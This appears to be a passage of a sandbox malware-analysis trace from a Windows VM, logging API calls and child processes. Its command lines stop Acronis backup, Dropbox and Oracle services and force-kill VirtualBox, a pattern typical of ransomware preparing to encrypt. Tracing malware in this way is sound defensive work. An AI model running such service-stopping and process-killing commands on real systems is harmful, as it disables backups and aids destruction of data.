[0069.162] FreeEnvironmentStringsW (penv=0x3540b8) returned 1 [0069.162] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.162] GetProcessHeap () returned 0x340000 [0069.162] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x355698 | out: hHeap=0x340000) returned 1 [0069.162] GetProcessHeap () returned 0x340000 [0069.162] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x400e) returned 0x356a38 [0069.162] GetProcessHeap () returned 0x340000 [0069.162] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x38) returned 0x351eb0 [0069.163] GetProcessHeap () returned 0x340000 [0069.163] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x356a38 | out: hHeap=0x340000) returned 1 [0069.163] GetConsoleOutputCP () returned 0x1b5 [0069.163] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.163] GetUserDefaultLCID () returned 0x409 [0069.163] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0069.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x33f8b0, cchData=128 | out: lpLCData="0") returned 2 [0069.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x33f8b0, cchData=128 | out: lpLCData="0") returned 2 [0069.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x33f8b0, cchData=128 | out: lpLCData="1") returned 2 [0069.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0069.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0069.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0069.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0069.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0069.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0069.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0069.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0069.164] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0069.164] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0069.164] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0069.165] GetProcessHeap () returned 0x340000 [0069.165] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x20c) returned 0x352dc0 [0069.166] GetConsoleTitleW (in: lpConsoleTitle=0x352dc0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.166] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.166] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0069.166] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0069.166] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0069.166] GetProcessHeap () returned 0x340000 [0069.166] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x400a) returned 0x356a38 [0069.166] GetProcessHeap () returned 0x340000 [0069.166] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x356a38 | out: hHeap=0x340000) returned 1 [0069.167] _wcsicmp (_String1="net", _String2=")") returned 69 [0069.167] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0069.167] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0069.167] _wcsicmp (_String1="IF", _String2="net") returned -5 [0069.167] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0069.167] _wcsicmp (_String1="REM", _String2="net") returned 4 [0069.167] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0069.167] GetProcessHeap () returned 0x340000 [0069.167] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x58) returned 0x352fd8 [0069.167] GetProcessHeap () returned 0x340000 [0069.167] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x10) returned 0x34ff08 [0069.167] GetProcessHeap () returned 0x340000 [0069.167] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x2e) returned 0x353038 [0069.168] GetConsoleTitleW (in: lpConsoleTitle=0x33f5a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.168] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.168] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.168] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.168] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.168] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.168] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.168] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.169] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.169] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.169] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.169] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.169] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.169] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.169] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.169] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.169] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.169] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.169] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.169] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.169] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.169] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.169] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.169] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.169] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.169] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.169] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.169] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.169] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.169] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.169] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.169] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.169] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.169] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.169] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.169] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.169] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.169] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.169] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.169] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.169] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.169] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.169] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.170] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.170] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.170] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.170] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.170] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.170] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.170] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.170] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.170] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.170] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.170] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.170] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.170] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.170] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.170] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.170] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.170] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.170] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.170] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.170] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.170] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.170] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.170] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.170] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.170] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.170] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.170] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.170] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.170] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.170] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.170] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.170] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.170] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.170] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.170] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.170] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.171] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.171] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.171] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.171] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.171] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.171] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.171] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0069.171] _wcsicmp (_String1="net", _String2="IF") returned 5 [0069.171] _wcsicmp (_String1="net", _String2="REM") returned -4 [0069.171] GetProcessHeap () returned 0x340000 [0069.171] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x210) returned 0x353070 [0069.171] GetProcessHeap () returned 0x340000 [0069.171] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x36) returned 0x353288 [0069.171] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0069.171] GetProcessHeap () returned 0x340000 [0069.171] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x418) returned 0x3407f0 [0069.171] SetErrorMode (uMode=0x0) returned 0x0 [0069.171] SetErrorMode (uMode=0x1) returned 0x0 [0069.171] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3407f8, lpFilePart=0x33f0c8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x33f0c8*="Desktop") returned 0x25 [0069.171] SetErrorMode (uMode=0x0) returned 0x1 [0069.171] GetProcessHeap () returned 0x340000 [0069.172] RtlReAllocateHeap (Heap=0x340000, Flags=0x0, Ptr=0x3407f0, Size=0x5c) returned 0x3407f0 [0069.172] GetProcessHeap () returned 0x340000 [0069.172] RtlSizeHeap (HeapHandle=0x340000, Flags=0x0, MemoryPointer=0x3407f0) returned 0x5c [0069.172] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.172] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0069.172] GetProcessHeap () returned 0x340000 [0069.172] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x120) returned 0x3532c8 [0069.172] GetProcessHeap () returned 0x340000 [0069.172] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x238) returned 0x340858 [0069.178] GetProcessHeap () returned 0x340000 [0069.178] RtlReAllocateHeap (Heap=0x340000, Flags=0x0, Ptr=0x340858, Size=0x122) returned 0x340858 [0069.178] GetProcessHeap () returned 0x340000 [0069.178] RtlSizeHeap (HeapHandle=0x340000, Flags=0x0, MemoryPointer=0x340858) returned 0x122 [0069.178] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.178] GetProcessHeap () returned 0x340000 [0069.178] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xe0) returned 0x3533f0 [0069.179] GetProcessHeap () returned 0x340000 [0069.179] RtlReAllocateHeap (Heap=0x340000, Flags=0x0, Ptr=0x3533f0, Size=0x76) returned 0x3533f0 [0069.179] GetProcessHeap () returned 0x340000 [0069.179] RtlSizeHeap (HeapHandle=0x340000, Flags=0x0, MemoryPointer=0x3533f0) returned 0x76 [0069.179] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.180] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x33ee44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33ee44) returned 0xffffffff [0069.180] GetLastError () returned 0x2 [0069.180] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x33ee44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33ee44) returned 0xffffffff [0069.180] GetLastError () returned 0x2 [0069.180] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.180] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x33ee44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33ee44) returned 0x353470 [0069.180] GetProcessHeap () returned 0x340000 [0069.180] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x3534b0 [0069.180] FindClose (in: hFindFile=0x353470 | out: hFindFile=0x353470) returned 1 [0069.180] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x33ee44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33ee44) returned 0xffffffff [0069.181] GetLastError () returned 0x2 [0069.181] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x33ee44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33ee44) returned 0x353470 [0069.181] GetProcessHeap () returned 0x340000 [0069.181] RtlReAllocateHeap (Heap=0x340000, Flags=0x0, Ptr=0x3534b0, Size=0x4) returned 0x3534b0 [0069.181] FindClose (in: hFindFile=0x353470 | out: hFindFile=0x353470) returned 1 [0069.181] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0069.181] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0069.181] GetConsoleTitleW (in: lpConsoleTitle=0x33f33c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.181] InitializeProcThreadAttributeList (in: lpAttributeList=0x33f1c4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x33f28c | out: lpAttributeList=0x33f1c4, lpSize=0x33f28c) returned 1 [0069.181] UpdateProcThreadAttribute (in: lpAttributeList=0x33f1c4, dwFlags=0x0, Attribute=0x60001, lpValue=0x33f284, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x33f1c4, lpPreviousValue=0x0) returned 1 [0069.181] GetStartupInfoW (in: lpStartupInfo=0x33f180 | out: lpStartupInfo=0x33f180*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0069.181] GetProcessHeap () returned 0x340000 [0069.181] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x18) returned 0x353470 [0069.181] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0069.181] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0069.181] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0069.181] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.181] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.181] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.181] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0069.181] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0069.181] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.182] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.182] GetProcessHeap () returned 0x340000 [0069.182] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x353470 | out: hHeap=0x340000) returned 1 [0069.182] GetProcessHeap () returned 0x340000 [0069.182] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xa) returned 0x34ff20 [0069.182] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0069.184] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop AcronisAgent", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x33f220*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop AcronisAgent", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x33f26c | out: lpCommandLine="net stop AcronisAgent", lpProcessInformation=0x33f26c*(hProcess=0x78, hThread=0x74, dwProcessId=0x88c, dwThreadId=0x89c)) returned 1 [0069.643] CloseHandle (hObject=0x74) returned 1 [0069.644] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0069.644] GetProcessHeap () returned 0x340000 [0069.644] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x355ef8 | out: hHeap=0x340000) returned 1 [0069.644] GetEnvironmentStringsW () returned 0x355ef8* [0069.644] GetProcessHeap () returned 0x340000 [0069.644] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xb36) returned 0x3540b8 [0069.644] FreeEnvironmentStringsW (penv=0x355ef8) returned 1 [0069.644] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0072.299] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x33f160 | out: lpExitCode=0x33f160*=0x2) returned 1 [0072.299] CloseHandle (hObject=0x78) returned 1 [0072.299] _vsnwprintf (in: _Buffer=0x33f2a8, _BufferCount=0x13, _Format="%08X", _ArgList=0x33f16c | out: _Buffer="00000002") returned 8 [0072.299] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0072.300] GetProcessHeap () returned 0x340000 [0072.300] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x3540b8 | out: hHeap=0x340000) returned 1 [0072.300] GetEnvironmentStringsW () returned 0x3540b8* [0072.300] GetProcessHeap () returned 0x340000 [0072.300] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xb5c) returned 0x3595a0 [0072.300] FreeEnvironmentStringsW (penv=0x3540b8) returned 1 [0072.300] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0072.300] GetProcessHeap () returned 0x340000 [0072.300] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x3595a0 | out: hHeap=0x340000) returned 1 [0072.300] GetEnvironmentStringsW () returned 0x3540b8* [0072.300] GetProcessHeap () returned 0x340000 [0072.300] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xb5c) returned 0x3595a0 [0072.300] FreeEnvironmentStringsW (penv=0x3540b8) returned 1 [0072.300] GetProcessHeap () returned 0x340000 [0072.300] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x34ff20 | out: hHeap=0x340000) returned 1 [0072.300] DeleteProcThreadAttributeList (in: lpAttributeList=0x33f1c4 | out: lpAttributeList=0x33f1c4) [0072.300] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.300] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0072.300] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.300] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0072.301] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.301] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0072.301] SetConsoleInputExeNameW () returned 0x1 [0072.301] GetConsoleOutputCP () returned 0x1b5 [0072.301] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0072.301] SetThreadUILanguage (LangId=0x0) returned 0x409 [0072.301] exit (_Code=2) Process: id = "25" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x7065000" os_pid = "0x958" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x40c" cmd_line = "net stop DbxSvc" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 48 os_tid = 0x6ec Process: id = "26" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x1e2c000" os_pid = "0x664" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xbe8" cmd_line = "taskkill /f /im virtualboxvm.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 49 os_tid = 0x694 Thread: id = 69 os_tid = 0x8cc Thread: id = 126 os_tid = 0xc4 Thread: id = 138 os_tid = 0x8ec Thread: id = 139 os_tid = 0x7a4 Process: id = "27" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x15ab000" os_pid = "0x6b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x900" cmd_line = "net stop OracleXETNSListener" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 50 os_tid = 0x408 Process: id = "28" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x167b000" os_pid = "0x80c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = 